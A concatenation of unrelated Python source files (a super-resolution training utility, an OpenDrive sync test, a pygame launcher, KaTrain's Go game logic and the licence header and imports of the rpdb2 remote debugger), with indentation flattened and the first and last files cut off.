os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
def str2bool(val):
"""enable default constant true arguments"""
# https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse
if isinstance(val, bool):
return val
elif val.lower() == 'true':
return True
elif val.lower() == 'false':
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected')
from model import common
def compute_costs(model, args):
print('-----------Compute Costs and Num. Params.-----------')
#original_MACs, original_params = get_model_complexity_info(model.model.G.module, (3,720,1280), as_strings=False)
original_MACs = 91.22 * 1e9
original_params = 1.11 * 1e6
# To obtain input spatial sizes in each layer
dummy = torch.ones([1,3,720//args.scale[0],1280//args.scale[0]]).cuda()
model(dummy, 0)
GMACs_after_pruning, original_MACs_for_conv = model.model.compute_costs()
pruned_params = 0
for m in model.model.modules():
if isinstance(m, common.SparseConv):
num_weight = m.weight.numel()
scores = torch.clamp(m.priority_scores, 0, 1.03)
prob = torch.cumprod(scores, dim=0)
binary = (prob>0.5).int().cuda()
N = 1 + binary.sum()
pruned_params += num_weight * (1-N/m.M)
params_after_pruning = original_params - pruned_params
print('--Before Pruning--')
print(f'GMACs: {round(original_MACs/1e9,2)}, Num. of Params.: {round(original_params/1e6,2)} M')
print('--After Pruning--')
print(f'GMACs: {round((original_MACs - original_MACs_for_conv + GMACs_after_pruning.item())/1e9,2)}, Num. of Params.: {round(params_after_pruning.item()/1e6,2)} M')
|
test_main.py
|
import os
import threading
import time
import unittest
from OpenDrive.client_side import file_changes_json as c_json
from OpenDrive.client_side import interface
from OpenDrive.client_side import main
from OpenDrive.client_side import paths as client_paths
from OpenDrive.server_side import paths as server_paths
from tests.client_side.helper_client import h_register_dummy_user_device_client
from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, \
h_clear_init_all_folders, h_create_empty
class TestMain(unittest.TestCase):
def setUp(self) -> None:
h_clear_init_all_folders()
self._server_process = h_start_server_process()
self.folder1_abs_local_path = client_paths.normalize_path(client_paths.LOCAL_CLIENT_DATA, "folder1")
h_create_empty(self.folder1_abs_local_path)
main.MIN_UPDATE_PAUSE_TIME = 1
def tearDown(self) -> None:
main.shutdown()
h_stop_server_process(self._server_process)
@h_client_routine(clear_folders=False)
def putest_start_logged_in(self):
user = h_register_dummy_user_device_client()
main_thread = threading.Thread(target=main.start, daemon=True)
main_thread.start()
time.sleep(2) # wait till changes.json is created
interface.add_sync_folder(self.folder1_abs_local_path, "folder1")
expected_content = c_json.get_all_data()
file_path = os.path.join(self.folder1_abs_local_path, "dummy.txt")
with open(file_path, "w") as f:
f.write("Hello World")
time.sleep(5) # wait till synchronization finished
expected_path = os.path.join(server_paths.get_users_root_folder(user.user_id), "folder1/dummy.txt")
self.assertTrue(os.path.exists(expected_path), "dummy file is not pulled to server!")
self.assertEqual(expected_content, c_json.get_all_data())
time.sleep(1) # wait till waiting...
|
dework.py
|
from configparser import ConfigParser
from multiprocessing import Process, Queue
import pygame
from core.data_retriever import DataRetriever
from core.data_presenter import DataPresenter
from core.logging_filters import create_logger
from scripts.create_db import create_db_if_not_present
CONFIG_FILE = 'config.ini'
pygame.init()
if __name__ == '__main__':
config = ConfigParser()
config.read(CONFIG_FILE)
logger = create_logger(config['general']['logging_path'], __name__)
logger.info("Starting main application")
create_db_if_not_present(CONFIG_FILE)
queue_retriever = Queue()
queue_presenter = Queue()
data_retriever = DataRetriever(CONFIG_FILE, queue_retriever)
data_presenter = DataPresenter(CONFIG_FILE, queue_presenter)
p_retrieve = Process(target=data_retriever.run)
p_present = Process(target=data_presenter.run)
p_retrieve.start()
p_present.start()
obj = queue_presenter.get()
logger.info("Received halting signal from presenter")
logger.info("halting retriever")
queue_retriever.put("halt")
logger.info("Closing queues")
queue_retriever.close()
queue_presenter.close()
queue_retriever.join_thread()
queue_presenter.join_thread()
logger.info("Joining processes")
p_present.join()
p_retrieve.join()
logger.info("Quitting pygame")
pygame.quit()
|
game.py
|
import math
import os
import re
import threading
from datetime import datetime
from typing import Dict, List, Optional, Union
from kivy.clock import Clock
from katrain.core.constants import (
HOMEPAGE,
OUTPUT_DEBUG,
OUTPUT_INFO,
STATUS_ANALYSIS,
STATUS_INFO,
STATUS_TEACHING,
PLAYER_AI,
)
from katrain.core.engine import KataGoEngine
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n, rank_label
from katrain.core.sgf_parser import SGF, Move
from katrain.core.utils import var_to_grid
class IllegalMoveException(Exception):
pass
class KaTrainSGF(SGF):
_NODE_CLASS = GameNode
class Game:
"""Represents a game of go, including an implementation of capture rules."""
DEFAULT_PROPERTIES = {"GM": 1, "FF": 4, "AP": f"KaTrain:{HOMEPAGE}", "CA": "UTF-8"}
def __init__(
self,
katrain,
engine: Union[Dict, KataGoEngine],
move_tree: GameNode = None,
analyze_fast=False,
game_properties: Optional[Dict] = None,
):
self.katrain = katrain
self._lock = threading.Lock()
if not isinstance(engine, Dict):
engine = {"B": engine, "W": engine}
self.engines = engine
self.game_id = datetime.strftime(datetime.now(), "%Y-%m-%d %H %M %S")
if move_tree:
self.root = move_tree
self.komi = self.root.komi
handicap = int(self.root.get_property("HA", 0))
if handicap and not self.root.placements:
self.root.place_handicap_stones(handicap)
else:
board_size = katrain.config("game/size")
self.komi = katrain.config("game/komi")
self.root = GameNode(
properties={
**Game.DEFAULT_PROPERTIES,
**{"SZ": board_size, "KM": self.komi, "DT": self.game_id},
**(game_properties or {}),
}
)
handicap = katrain.config("game/handicap")
if handicap:
self.root.place_handicap_stones(handicap)
if not self.root.get_property("RU"):
self.root.set_property("RU", katrain.config("game/rules"))
self.set_current_node(self.root)
threading.Thread(
target=lambda: self.analyze_all_nodes(-1_000_000, analyze_fast=analyze_fast), daemon=True
).start() # return faster, but bypass Kivy Clock
def analyze_all_nodes(self, priority=0, analyze_fast=False):
for node in self.root.nodes_in_tree:
node.analyze(self.engines[node.next_player], priority=priority, analyze_fast=analyze_fast)
# -- move tree functions --
def _calculate_groups(self):
board_size_x, board_size_y = self.board_size
with self._lock:
self.board = [
[-1 for _x in range(board_size_x)] for _y in range(board_size_y)
] # type: List[List[int]] # board pos -> chain id
self.chains = [] # type: List[List[Move]] # chain id -> chain
self.prisoners = [] # type: List[Move]
self.last_capture = [] # type: List[Move]
try:
for node in self.current_node.nodes_from_root:
for m in node.move_with_placements:
self._validate_move_and_update_chains(
m, True
) # ignore ko since we didn't know if it was forced
except IllegalMoveException as e:
raise Exception(f"Unexpected illegal move ({str(e)})")
def _validate_move_and_update_chains(self, move: Move, ignore_ko: bool):
board_size_x, board_size_y = self.board_size
def neighbours(moves):
return {
self.board[m.coords[1] + dy][m.coords[0] + dx]
for m in moves
for dy, dx in [(-1, 0), (1, 0), (0, -1), (0, 1)]
if 0 <= m.coords[0] + dx < board_size_x and 0 <= m.coords[1] + dy < board_size_y
}
ko_or_snapback = len(self.last_capture) == 1 and self.last_capture[0] == move
self.last_capture = []
if move.is_pass:
return
if self.board[move.coords[1]][move.coords[0]] != -1:
raise IllegalMoveException("Space occupied")
nb_chains = list({c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player == move.player})
if nb_chains:
this_chain = nb_chains[0]
self.board = [
[nb_chains[0] if sq in nb_chains else sq for sq in line] for line in self.board
] # merge chains connected by this move
for oc in nb_chains[1:]:
self.chains[nb_chains[0]] += self.chains[oc]
self.chains[oc] = []
self.chains[nb_chains[0]].append(move)
else:
this_chain = len(self.chains)
self.chains.append([move])
self.board[move.coords[1]][move.coords[0]] = this_chain
opp_nb_chains = {c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player != move.player}
for c in opp_nb_chains:
if -1 not in neighbours(self.chains[c]):
self.last_capture += self.chains[c]
for om in self.chains[c]:
self.board[om.coords[1]][om.coords[0]] = -1
self.chains[c] = []
if ko_or_snapback and len(self.last_capture) == 1 and not ignore_ko:
raise IllegalMoveException("Ko")
self.prisoners += self.last_capture
if -1 not in neighbours(self.chains[this_chain]): # TODO: NZ rules?
raise IllegalMoveException("Suicide")
# Play a Move from the current position, raise IllegalMoveException if invalid.
def play(self, move: Move, ignore_ko: bool = False, analyze=True):
board_size_x, board_size_y = self.board_size
if not move.is_pass and not (0 <= move.coords[0] < board_size_x and 0 <= move.coords[1] < board_size_y):
raise IllegalMoveException(f"Move {move} outside of board coordinates")
try:
self._validate_move_and_update_chains(move, ignore_ko)
except IllegalMoveException:
self._calculate_groups()
raise
with self._lock:
played_node = self.current_node.play(move)
self.current_node = played_node
if analyze:
played_node.analyze(self.engines[played_node.next_player])
return played_node
def set_current_node(self, node):
self.current_node = node
self._calculate_groups()
def undo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if not cn.is_root:
cn = cn.parent
self.set_current_node(cn)
def redo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if cn.children:
cn = cn.ordered_children[0]
self.set_current_node(cn)
def cycle_children(self, direction):
cn = self.current_node # avoid race conditions
if cn.parent and len(cn.parent.children) > 1:
ordered_children = cn.parent.ordered_children
ix = (ordered_children.index(cn) + len(ordered_children) + direction) % len(ordered_children)
self.set_current_node(ordered_children[ix])
@property
def board_size(self):
return self.root.board_size
@property
def stones(self):
with self._lock:
return sum(self.chains, [])
@property
def ended(self):
return self.current_node.parent and self.current_node.is_pass and self.current_node.parent.is_pass
@property
def prisoner_count(
self,
) -> Dict: # returns prisoners that are of a certain colour as {B: black stones captures, W: white stones captures}
return {player: sum([m.player == player for m in self.prisoners]) for player in Move.PLAYERS}
@property
def manual_score(self):
rules = self.engines["B"].get_rules(self.root)
if not self.current_node.ownership or rules != "japanese":
if not self.current_node.score:
return None
self.katrain.log(
f"rules '{rules}' are not japanese, or no ownership available ({not self.current_node.ownership}) -> no manual score available",
OUTPUT_DEBUG,
)
return self.current_node.format_score(round(2 * self.current_node.score) / 2) + "?"
board_size_x, board_size_y = self.board_size
ownership_grid = var_to_grid(self.current_node.ownership, (board_size_x, board_size_y))
stones = {m.coords: m.player for m in self.stones}
lo_threshold = 0.15
hi_threshold = 0.85
max_unknown = 10
max_dame = 4 * (board_size_x + board_size_y)
def japanese_score_square(square, owner):
player = stones.get(square, None)
if (
(player == "B" and owner > hi_threshold)
or (player == "W" and owner < -hi_threshold)
or abs(owner) < lo_threshold
):
return 0 # dame or own stones
if player is None and abs(owner) >= hi_threshold:
return round(owner) # surrounded empty intersection
if (player == "B" and owner < -hi_threshold) or (player == "W" and owner > hi_threshold):
return 2 * round(owner) # captured stone
return math.nan # unknown!
scored_squares = [
japanese_score_square((x, y), ownership_grid[y][x])
for y in range(board_size_y)
for x in range(board_size_x)
]
num_sq = {t: sum([s == t for s in scored_squares]) for t in [-2, -1, 0, 1, 2]}
num_unkn = sum(math.isnan(s) for s in scored_squares)
prisoners = self.prisoner_count
score = sum([t * n for t, n in num_sq.items()]) + prisoners["W"] - prisoners["B"] - self.komi
self.katrain.log(
f"Manual Scoring: {num_sq} score by square with {num_unkn} unknown, {prisoners} captures, and {self.komi} komi -> score = {score}",
OUTPUT_DEBUG,
)
if num_unkn > max_unknown or (num_sq[0] - len(stones)) > max_dame:
return None
return self.current_node.format_score(score)
def __repr__(self):
return (
"\n".join("".join(self.chains[c][0].player if c >= 0 else "-" for c in line) for line in self.board)
+ f"\ncaptures: {self.prisoner_count}"
)
def write_sgf(
self, path: str, trainer_config: Optional[Dict] = None,
):
if trainer_config is None:
trainer_config = self.katrain.config("trainer")
save_feedback = trainer_config["save_feedback"]
eval_thresholds = trainer_config["eval_thresholds"]
def player_name(player_info):
return f"{i18n._(player_info.player_type)} ({i18n._(player_info.player_subtype)})"
if "KaTrain" in self.root.get_property("AP", ""):
for bw in "BW":
self.root.set_property("P" + bw, player_name(self.katrain.players_info[bw]))
player_info = self.katrain.players_info[bw]
if player_info.player_type == PLAYER_AI:
self.root.set_property(bw + "R", rank_label(player_info.calculated_rank))
player_names = {bw: re.sub(r"['<>:\"/\\|?*]", "", self.root.get_property("P" + bw, bw)) for bw in "BW"}
game_name = f"katrain_{player_names['B']} vs {player_names['W']} {self.game_id}"
file_name = os.path.abspath(os.path.join(path, f"{game_name}.sgf"))
os.makedirs(os.path.dirname(file_name), exist_ok=True)
show_dots_for = {
bw: trainer_config.get("eval_show_ai", True) or self.katrain.players_info[bw].human for bw in "BW"
}
sgf = self.root.sgf(
save_comments_player=show_dots_for, save_comments_class=save_feedback, eval_thresholds=eval_thresholds
)
with open(file_name, "w", encoding="utf-8") as f:
f.write(sgf)
return i18n._("sgf written").format(file_name=file_name)
def analyze_extra(self, mode, **kwargs):
stones = {s.coords for s in self.stones}
cn = self.current_node
engine = self.engines[cn.next_player]
Clock.schedule_once(self.katrain.analysis_controls.hints.activate, 0)
if mode == "extra":
if kwargs.get("continuous", False):
visits = max(engine.config["max_visits"], math.ceil(cn.analysis_visits_requested * 1.25))
else:
visits = cn.analysis_visits_requested + engine.config["max_visits"]
self.katrain.controls.set_status(i18n._("extra analysis").format(visits=visits), STATUS_ANALYSIS)
cn.analyze(engine, visits=visits, priority=-1_000, time_limit=False)
return
if mode == "game":
nodes = self.root.nodes_in_tree
if "visits" in kwargs:
visits = kwargs["visits"]
else:
min_visits = min(node.analysis_visits_requested for node in nodes)
visits = min_visits + engine.config["max_visits"]
for node in nodes:
node.analyze(engine, visits=visits, priority=-1_000_000, time_limit=False)
self.katrain.controls.set_status(i18n._("game re-analysis").format(visits=visits), STATUS_ANALYSIS)
return
elif mode == "sweep":
board_size_x, board_size_y = self.board_size
if cn.analysis_ready:
policy_grid = (
var_to_grid(self.current_node.policy, size=(board_size_x, board_size_y))
if self.current_node.policy
else None
)
analyze_moves = sorted(
[
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (policy_grid is None and (x, y) not in stones) or policy_grid[y][x] >= 0
],
key=lambda mv: -policy_grid[mv.coords[1]][mv.coords[0]],
)
else:
analyze_moves = [
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (x, y) not in stones
]
visits = engine.config["fast_visits"]
self.katrain.controls.set_status(i18n._("sweep analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000_000_000
elif mode == "equalize":
if not cn.analysis_ready:
self.katrain.controls.set_status(i18n._("wait-before-equalize"), STATUS_INFO, self.current_node)
return
analyze_moves = [Move.from_gtp(gtp, player=cn.next_player) for gtp, _ in cn.analysis["moves"].items()]
visits = max(d["visits"] for d in cn.analysis["moves"].values())
self.katrain.controls.set_status(i18n._("equalizing analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000
else:
raise ValueError("Invalid analysis mode")
for move in analyze_moves:
cn.analyze(
engine, priority, visits=visits, refine_move=move, time_limit=False
) # explicitly requested so take as long as you need
def analyze_undo(self, node):
train_config = self.katrain.config("trainer")
move = node.move
if node != self.current_node or node.auto_undo is not None or not node.analysis_ready or not move:
return
points_lost = node.points_lost
thresholds = train_config["eval_thresholds"]
num_undo_prompts = train_config["num_undo_prompts"]
i = 0
while i < len(thresholds) and points_lost < thresholds[i]:
i += 1
num_undos = num_undo_prompts[i] if i < len(num_undo_prompts) else 0
if num_undos == 0:
undo = False
elif num_undos < 1: # probability
undo = int(node.undo_threshold < num_undos) and len(node.parent.children) == 1
else:
undo = len(node.parent.children) <= num_undos
node.auto_undo = undo
if undo:
self.undo(1)
self.katrain.controls.set_status(
i18n._("teaching undo message").format(move=move.gtp(), points_lost=points_lost), STATUS_TEACHING
)
self.katrain.update_state()
|
rpdb2.py
|
#! /usr/bin/env python
"""
rpdb2.py - version 2.4.8
A remote Python debugger for CPython
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02111-1307 USA
"""
COPYRIGHT_NOTICE = """Copyright (C) 2005-2009 Nir Aides"""
CREDITS_NOTICE = """Work on version 2.4.8 was sponsored by Investortools, Inc."""
LICENSE_NOTICE = """
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
A copy of the GPL with the precise terms and conditions for
copying, distribution and modification follow:
"""
COPY_OF_THE_GPL_LICENSE = """
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0.
This License applies to any program or other work which contains a notice
placed by the copyright holder saying it may be distributed under the terms
of this General Public License. The "Program", below, refers to any such
program or work, and a "work based on the Program" means either the Program
or any derivative work under copyright law: that is to say, a work containing
the Program or a portion of it, either verbatim or with modifications and/or
translated into another language. (Hereinafter, translation is included
without limitation in the term "modification".) Each licensee is addressed
as "you".
Activities other than copying, distribution and modification are not covered
by this License; they are outside its scope. The act of running the Program
is not restricted, and the output from the Program is covered only if its
contents constitute a work based on the Program (independent of having been
made by running the Program). Whether that is true depends on what the
Program does.
1.
You may copy and distribute verbatim copies of the Program's source code as
you receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice and
disclaimer of warranty; keep intact all the notices that refer to this
License and to the absence of any warranty; and give any other recipients of
the Program a copy of this License along with the Program.
You may charge a fee for the physical act of transferring a copy, and you
may at your option offer warranty protection in exchange for a fee.
2.
You may modify your copy or copies of the Program or any portion of it, thus
forming a work based on the Program, and copy and distribute such modifications
or work under the terms of Section 1 above, provided that you also meet all
of these conditions:
a) You must cause the modified files to carry prominent notices stating
that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in whole
or in part contains or is derived from the Program or any part thereof,
to be licensed as a whole at no charge to all third parties under the
terms of this License.
c) If the modified program normally reads commands interactively when
run, you must cause it, when started running for such interactive use in
the most ordinary way, to print or display an announcement including an
appropriate copyright notice and a notice that there is no warranty (or
else, saying that you provide a warranty) and that users may redistribute
the program under these conditions, and telling the user how to view a
copy of this License. (Exception: if the Program itself is interactive
but does not normally print such an announcement, your work based on the
Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If identifiable
sections of that work are not derived from the Program, and can be reasonably
considered independent and separate works in themselves, then this License,
and its terms, do not apply to those sections when you distribute them as
separate works. But when you distribute the same sections as part of a whole
which is a work based on the Program, the distribution of the whole must be
on the terms of this License, whose permissions for other licensees extend to
the entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest your
rights to work written entirely by you; rather, the intent is to exercise the
right to control the distribution of derivative or collective works based on
the Program.
In addition, mere aggregation of another work not based on the Program with
the Program (or with a work based on the Program) on a volume of a storage or
distribution medium does not bring the other work under the scope of this
License.
3. You may copy and distribute the Program (or a work based on it, under
Section 2) in object code or executable form under the terms of Sections 1
and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable source
code, which must be distributed under the terms of Sections 1 and 2 above
on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three years, to
give any third party, for a charge no more than your cost of physically
performing source distribution, a complete machine-readable copy of the
corresponding source code, to be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer to
distribute corresponding source code. (This alternative is allowed only
for noncommercial distribution and only if you received the program in
object code or executable form with such an offer, in accord with
Subsection b above.)
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all
the source code for all modules it contains, plus any associated interface
definition files, plus the scripts used to control compilation and
installation of the executable. However, as a special exception, the source
code distributed need not include anything that is normally distributed (in
either source or binary form) with the major components (compiler, kernel,
and so on) of the operating system on which the executable runs, unless that
component itself accompanies the executable.
If distribution of executable or object code is made by offering access to
copy from a designated place, then offering equivalent access to copy the
source code from the same place counts as distribution of the source code,
even though third parties are not compelled to copy the source along with
the object code.
4. You may not copy, modify, sublicense, or distribute the Program except as
expressly provided under this License. Any attempt otherwise to copy, modify,
sublicense or distribute the Program is void, and will automatically
terminate your rights under this License. However, parties who have received
copies, or rights, from you under this License will not have their licenses
terminated so long as such parties remain in full compliance.
5. You are not required to accept this License, since you have not signed it.
However, nothing else grants you permission to modify or distribute the
Program or its derivative works. These actions are prohibited by law if you
do not accept this License. Therefore, by modifying or distributing the
Program (or any work based on the Program), you indicate your acceptance of
this License to do so, and all its terms and conditions for copying,
distributing or modifying the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the Program),
the recipient automatically receives a license from the original licensor to
copy, distribute or modify the Program subject to these terms and conditions.
You may not impose any further restrictions on the recipients' exercise of
the rights granted herein. You are not responsible for enforcing compliance
by third parties to this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot distribute so as to satisfy
simultaneously your obligations under this License and any other pertinent
obligations, then as a consequence you may not distribute the Program at all.
For example, if a patent license would not permit royalty-free redistribution
of the Program by all those who receive copies directly or indirectly through
you, then the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under any
particular circumstance, the balance of the section is intended to apply and
the section as a whole is intended to apply in other circumstances.
It is not the purpose of this section to induce you to infringe any patents
or other property right claims or to contest validity of any such claims;
this section has the sole purpose of protecting the integrity of the free
software distribution system, which is implemented by public license
practices. Many people have made generous contributions to the wide range of
software distributed through that system in reliance on consistent
application of that system; it is up to the author/donor to decide if he or
she is willing to distribute software through any other system and a licensee
cannot impose that choice.
This section is intended to make thoroughly clear what is believed to be a
consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in certain
countries either by patents or by copyrighted interfaces, the original
copyright holder who places the Program under this License may add an
explicit geographical distribution limitation excluding those countries,
so that distribution is permitted only in or among countries not thus
excluded. In such case, this License incorporates the limitation as if
written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions of
the General Public License from time to time. Such new versions will be
similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and
"any later version", you have the option of following the terms and
conditions either of that version or of any later version published by the
Free Software Foundation. If the Program does not specify a version number
of this License, you may choose any version ever published by the
Free Software Foundation.
10. If you wish to incorporate parts of the Program into other free programs
whose distribution conditions are different, write to the author to ask for
permission. For software which is copyrighted by the Free Software
Foundation, write to the Free Software Foundation; we sometimes make
exceptions for this. Our decision will be guided by the two goals of
preserving the free status of all derivatives of our free software and of
promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR
THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE
STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE
PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND
PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE,
YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO
LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR
THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
"""
if '.' in __name__:
raise ImportError('rpdb2 must not be imported as part of a package!')
import subprocess
import threading
import traceback
import zipimport
import tempfile
import __main__
import platform
import operator
import weakref
import os.path
import zipfile
import pickle
import socket
import getopt
import string
import random
import base64
import atexit
import locale
import codecs
import signal
import errno
import time
import copy
import hmac
import stat
import zlib
import sys
import cmd
import imp
import os
import re
try:
import hashlib
_md5 = hashlib.md5
except:
import md5
_md5 = md5
try:
import compiler
import sets
except:
pass
try:
import popen2
except:
pass
try:
from Crypto.Cipher import DES
except ImportError:
pass
#
# Pre-Import needed by my_abspath1
#
try:
from nt import _getfullpathname
except ImportError:
pass
try:
import SimpleXMLRPCServer
import xmlrpclib
import SocketServer
import commands
import copy_reg
import httplib
import thread
except:
#
# The above modules were renamed in Python 3 so try to import them 'as'
#
import xmlrpc.server as SimpleXMLRPCServer
